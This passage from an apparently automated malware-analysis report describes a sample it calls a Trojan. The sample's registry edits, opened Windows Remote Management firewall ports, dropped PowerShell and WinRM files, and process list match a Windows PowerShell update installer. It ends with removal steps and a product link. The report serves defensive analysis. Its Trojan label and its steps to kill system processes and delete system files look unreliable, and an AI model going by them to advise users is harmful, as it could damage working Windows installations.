"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"LastModTime" = "EE 5D C6 CF 6D BF D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A F9 89 37 30 2B A7 89 54 64 64 A5 D1 61 C2 92"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"MVID" = "BE 89 7C E6 CB 7D 25 17 02 86 EA BC EA E9 F4 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "96"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
The process mscorsvw.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 85 94 52 B4 87 87 83 82 8C 5F F5 5C 13 6C 63"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 1B AF 49 9D BB 3E 77 11 05 E0 35 37 10 B2 83"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D C1 8A 10 15 BD 2C AC EB B8 1C 44 8C B1 6B 76"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2160 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 C5 D8 17 65 AE 8C 68 FD A4 DF D9 7A A1 06 2B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 D6 07 C7 BF 6E 72 08 7F 79 7C CC 52 AB 95 88"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process wsmanhttpconfig.exe:2476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB C7 56 CF 0B 57 74 55 D7 DE 66 FD E6 6D 07 A5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "8DB1A22B-013F-4164-9415-A8709C68A97A"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""
The process wsmanhttpconfig.exe:2536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E D6 72 0A 6B BF E6 D6 B1 62 36 93 CA 64 3E C1"
Dropped PE files
MD5 | File path |
---|---|
9859a26d5e72bbb0685af813b409d99d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe |
fc9a05096522bb6d7ceda62ea1707420 | c:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe |
35efd8cd6549a4339cb2a28c8cfd6598 | c:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe |
a39df582ca051afc8811fbd00db12f10 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe |
9a055da2f2819f155c33d47cd67a7c00 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll |
75c183e262bd4400eb0f20349f6ef383 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll |
2f7fe3a781ba8c0a67c775f20e3e9f70 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll |
4e2482e69baaf3a5b13db8101c063ebf | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.resources.dll |
08e87e8abf7b41b28663dce817ce0ab6 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll |
b87e087fc013225e2aa1cb60c080647d | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll |
f3ac3f844f90380aab2b4c0836c4288f | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll |
1ce73fb3f88c716cfc3fd550547d2b35 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll |
dfeb401cc051e5da721c584ff6a90f88 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll |
36ff641f37918f2cca98e7f407ac4d75 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll |
3991b7fa452a9c9c291c06365a236792 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll |
37bed865557084dd9988350ab1675e0b | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Editor.resources.dll |
208fa9d0ebe2ceb9616042772e96598e | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Editor.dll |
108500a98b9a2f66823e7615398fc87b | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.resources.dll |
d4eefccdc3de6ced901535fa4153c491 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.dll |
5a69fb5d686f863e0e13268d671ef16d | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.resources.dll |
3eab4dbdc290edc4d53fe77f1fdb9e59 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.dll |
c7a0d1321a67a2afd330c5fbe79befd1 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll |
53a9d748ef09920a0d06da2583c298ad | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll |
6372ea7d2aced7185183cf3fcdd3577b | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.WSMan.Management.resources.dll |
1a4e900c2fe3cd31d10107670d184fe6 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll |
f7da27672d2e4c21a1f996ee31de0dbf | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll |
2286b57ecc2d32d24049c51989084268 | c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en_31bf3856ad364e35\System.Management.Automation.resources.dll |
4d8ab4fad244f7985d8c59d456e026d7 | c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll |
930cdc3163f4d4a6bd52f96896e9fa44 | c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.Backgroun#\fd3edcdfa9ce60abac35208146184495\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll |
e27a37cfbcff4c9941e73c9a3e762d0c | c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\13fc3daef585098f11911f8f72ac1cea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll |
8984e670f9760c504c5fca8370ad99d3 | c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\93926797486d4f7a9b69c5875ff3fc30\Microsoft.PowerShell.Commands.Utility.ni.dll |
fe8b145b025e02fb4e23381a2e189d0a | c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\dc19f50c5e84e7223433cc709e7eb43f\Microsoft.PowerShell.ConsoleHost.ni.dll |
6756eea89ecbaa301b79e4d01f381cd1 | c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\f007ee1bf548ba761ba616f4c35b158e\Microsoft.PowerShell.Commands.Management.ni.dll |
85d7ab466d0577c49fc9879107ec7ef5 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll |
173d3dd1425a8e33fa1d4ed71067a3a2 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\microsoft.backgroundintelligenttransfer.management.interop.dll |
df4217ddb34a0b73dc7aac7829371c0c | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe |
fe7bc06af17d7cd8fb8e6d72d72453b8 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui |
36b6f71b6d7d280302b348145db05a9f | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.exe |
cb3a534127f37d0fa1f556dbb76575d3 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.resources.dll |
95b7f12a557dedac5e4a1e9afa5e73ab | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll |
a94243b797377ba03b63fc716c13bcf5 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll |
7943a80f1a6fd37969aacd411b511f91 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll |
2c9c9ae86eb2b4e78c8e09deb7509a63 | c:\WINDOWS\system32\WsmAuto.dll |
67146d3606be1111a39f0fd61f47e9b6 | c:\WINDOWS\system32\WsmRes.dll |
18f347402da544a780949b8fdf83351b | c:\WINDOWS\system32\WsmSvc.dll |
296e6992278fea7140d88b603e6c2a8a | c:\WINDOWS\system32\WsmWmiPl.dll |
8c386819bf5b39d7a4b274d0b55f87a5 | c:\WINDOWS\system32\pwrshplugin.dll |
84e025b1259c66315f4d45a6caecacc9 | c:\WINDOWS\system32\wevtfwd.dll |
cd17705af8e53a82facb545a213ab09c | c:\WINDOWS\system32\winrmprov.dll |
afdf7654880ce23005014895b129d948 | c:\WINDOWS\system32\winrs.exe |
3e9b11880ae4a8ff399ce0573c82655b | c:\WINDOWS\system32\winrscmd.dll |
62021e3e6ba13d72cf5cc1047cfac991 | c:\WINDOWS\system32\winrshost.exe |
b84092e52861a026fc83bcede4a7abfa | c:\WINDOWS\system32\winrsmgr.dll |
35bc7c49676e5ab617ef94dc9854a6f1 | c:\WINDOWS\system32\winrssrv.dll |
972916faac89c4aa978952b30f478e81 | c:\WINDOWS\system32\wsmanhttpconfig.exe |
23ce21efc2ae95700f2b1f9582fe3867 | c:\WINDOWS\system32\wsmplpxy.dll |
faa2fcc6853e5123e05dccc5919657e2 | c:\WINDOWS\system32\wsmprovhost.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
mofcomp.exe:2556
WindowsXP-KB968930-x86-ENG.exe:176
ngen.exe:3900
ngen.exe:3924
ngen.exe:3916
ngen.exe:3496
ngen.exe:3908
ngen.exe:3416
ngen.exe:3536
ngen.exe:3452
ngen.exe:3552
ngen.exe:3576
ngen.exe:3436
ngen.exe:3940
ngen.exe:3488
ngen.exe:3932
ngen.exe:3520
ngen.exe:3528
ngen.exe:3544
ngen.exe:3560
ngen.exe:3428
ngen.exe:3460
ngen.exe:3376
ngen.exe:3568
ngen.exe:3444
update.exe:1716
%original file name%.exe:464
PSCustomSetupUtil.exe:3592
PSCustomSetupUtil.exe:2596
PSCustomSetupUtil.exe:2900
PSCustomSetupUtil.exe:3776
PSCustomSetupUtil.exe:3612
PSCustomSetupUtil.exe:3736
PSCustomSetupUtil.exe:3164
PSCustomSetupUtil.exe:3008
PSCustomSetupUtil.exe:3660
PSCustomSetupUtil.exe:3124
PSCustomSetupUtil.exe:2744
PSCustomSetupUtil.exe:2968
PSCustomSetupUtil.exe:3080
PSCustomSetupUtil.exe:2620
PSCustomSetupUtil.exe:2768
PSCustomSetupUtil.exe:2876
PSCustomSetupUtil.exe:2720
PSCustomSetupUtil.exe:2924
PSCustomSetupUtil.exe:3708
PSCustomSetupUtil.exe:3800
PSCustomSetupUtil.exe:3056
PSCustomSetupUtil.exe:2836
PSCustomSetupUtil.exe:3644
PSCustomSetupUtil.exe:2680
PSCustomSetupUtil.exe:3032
PSCustomSetupUtil.exe:3684
PSSetupNativeUtils.exe:4084
mscorsvw.exe:2596
mscorsvw.exe:2432
mscorsvw.exe:3888
mscorsvw.exe:2344
mscorsvw.exe:2052
mscorsvw.exe:2056
mscorsvw.exe:1612
mscorsvw.exe:2248
mscorsvw.exe:504
mscorsvw.exe:2504
mscorsvw.exe:2116
mscorsvw.exe:2428
mscorsvw.exe:2440
mscorsvw.exe:580
mscorsvw.exe:3588
mscorsvw.exe:3400
mscorsvw.exe:3248
mscorsvw.exe:2316
mscorsvw.exe:3372
mscorsvw.exe:2168
mscorsvw.exe:372
mscorsvw.exe:2536
mscorsvw.exe:2160
mscorsvw.exe:516
wsmanhttpconfig.exe:2476
wsmanhttpconfig.exe:2536 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_ise.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_logical_operators.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_wildcards.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ea6d03fb84304f0031a48a\about_requires.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_methods.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_signing.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.resources.dll (13 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.mof (789 bytes)
C:\ea6d03fb84304f0031a48a\update\update.inf (2457 bytes)
C:\ea6d03fb84304f0031a48a\about_automatic_variables.help.txt (14 bytes)
C:\ea6d03fb84304f0031a48a\about_throw.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\pssetupnativeutils.exe (9 bytes)
C:\ea6d03fb84304f0031a48a\getevent.types.ps1xml (15 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.format.ps1xml (16 bytes)
C:\ea6d03fb84304f0031a48a\about_parameters.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\winrscmd.dll (2907 bytes)
C:\ea6d03fb84304f0031a48a\wsmsvc.dll (15909 bytes)
C:\ea6d03fb84304f0031a48a\about_types.ps1xml.help.txt (481 bytes)
C:\ea6d03fb84304f0031a48a\about_eventlogs.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\spmsg.dll (495 bytes)
C:\ea6d03fb84304f0031a48a\about_ws-management_cmdlets.help.txt (405 bytes)
C:\$Directory (800 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.dll-help.xml (16567 bytes)
C:\ea6d03fb84304f0031a48a\about_command_syntax.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_format.ps1xml.help.txt (17 bytes)
C:\ea6d03fb84304f0031a48a\about_command_precedence.help.txt (8 bytes)
C:\ea6d03fb84304f0031a48a\pwrshmsg.dll (4 bytes)
C:\ea6d03fb84304f0031a48a\update\kb968930xp.cat (512 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ea6d03fb84304f0031a48a\wsmres.dll (6164 bytes)
C:\ea6d03fb84304f0031a48a\about_comment_based_help.help.txt (595 bytes)
C:\ea6d03fb84304f0031a48a\about_assignment_operators.help.txt (379 bytes)
C:\ea6d03fb84304f0031a48a\about_quoting_rules.help.txt (659 bytes)
C:\ea6d03fb84304f0031a48a\pwrshsip.dll (24 bytes)
C:\ea6d03fb84304f0031a48a\wsmprovhost.exe (657 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\ea6d03fb84304f0031a48a\about_split.help.txt (10 bytes)
C:\ea6d03fb84304f0031a48a\about_variables.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_providers.help.txt (59 bytes)
C:\ea6d03fb84304f0031a48a\winrssrv.dll (12 bytes)
C:\ea6d03fb84304f0031a48a\about_hash_tables.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_language_keywords.help.txt (11 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.dll (1842 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_methods.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\eventforwarding.adm (2 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ea6d03fb84304f0031a48a\winrm.cmd (35 bytes)
C:\ea6d03fb84304f0031a48a\about_prompts.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\about_script_internationalization.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\about_trap.help.txt (10 bytes)
C:\ea6d03fb84304f0031a48a\powershellcore.format.ps1xml (1492 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.dll (591 bytes)
C:\ea6d03fb84304f0031a48a\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ea6d03fb84304f0031a48a\about_locations.help.txt (794 bytes)
C:\ea6d03fb84304f0031a48a\about_operators.help.txt (770 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_output.help.txt (887 bytes)
C:\ea6d03fb84304f0031a48a\about_type_operators.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_redirection.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\spupdsvc.exe (287 bytes)
C:\ea6d03fb84304f0031a48a\about_transactions.help.txt (1011 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.runtime.dll (33 bytes)
C:\ea6d03fb84304f0031a48a\winrm.ini (1956 bytes)
C:\ea6d03fb84304f0031a48a\update\update.ver (14 bytes)
C:\ea6d03fb84304f0031a48a\about_join.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_continue.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\about_preference_variables.help.txt (37 bytes)
C:\ea6d03fb84304f0031a48a\about_modules.help.txt (13 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ea6d03fb84304f0031a48a\help.format.ps1xml (3947 bytes)
C:\ea6d03fb84304f0031a48a\update\update.exe (10748 bytes)
C:\ea6d03fb84304f0031a48a\spuninst.exe (3787 bytes)
C:\ea6d03fb84304f0031a48a\pwrshplugin.dll (802 bytes)
C:\ea6d03fb84304f0031a48a\windowspowershellhelp.chm (26041 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.resources.dll (3153 bytes)
C:\ea6d03fb84304f0031a48a\about_jobs.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ea6d03fb84304f0031a48a\update\eula.txt (586 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_pssession_details.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ea6d03fb84304f0031a48a\about_do.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_special_characters.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_line_editing.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\winrs.exe (1154 bytes)
C:\ea6d03fb84304f0031a48a\about_return.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_commonparameters.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\about_properties.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\about_while.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_if.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe (7339 bytes)
C:\ea6d03fb84304f0031a48a\dotnettypes.format.ps1xml (266 bytes)
C:\ea6d03fb84304f0031a48a\about_break.help.txt (792 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_jobs.help.txt (13 bytes)
C:\ea6d03fb84304f0031a48a\wsmtxt.xsl (2 bytes)
C:\ea6d03fb84304f0031a48a\winrm.vbs (2727 bytes)
C:\ea6d03fb84304f0031a48a\about_scripts.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\update\updspapi.dll (5940 bytes)
C:\ea6d03fb84304f0031a48a\about_regular_expressions.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\default.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_environment_variables.help.txt (417 bytes)
C:\ea6d03fb84304f0031a48a\update\spcustom.dll (23 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ea6d03fb84304f0031a48a\about_profiles.help.txt (457 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ea6d03fb84304f0031a48a\importallmodules.psd1 (438 bytes)
C:\ea6d03fb84304f0031a48a\about_parsing.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_core_commands.help.txt (221 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_faq.help.txt (775 bytes)
C:\ea6d03fb84304f0031a48a\about_pssessions.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\wsmwmipl.dll (2816 bytes)
C:\ea6d03fb84304f0031a48a\winrsmgr.dll (2 bytes)
C:\ea6d03fb84304f0031a48a\wsmpty.xsl (1 bytes)
C:\ea6d03fb84304f0031a48a\about_try_catch_finally.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.resources.dll (9 bytes)
C:\ea6d03fb84304f0031a48a\about_foreach.help.txt (10 bytes)
C:\ea6d03fb84304f0031a48a\about_session_configurations.help.txt (276 bytes)
C:\ea6d03fb84304f0031a48a\about_history.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_for.help.txt (146 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.mof (4 bytes)
C:\ea6d03fb84304f0031a48a\about_path_syntax.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_objects.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ea6d03fb84304f0031a48a\powershelltrace.format.ps1xml (344 bytes)
C:\ea6d03fb84304f0031a48a\about_arithmetic_operators.help.txt (168 bytes)
C:\ea6d03fb84304f0031a48a\about_execution_policies.help.txt (13 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.psd1 (950 bytes)
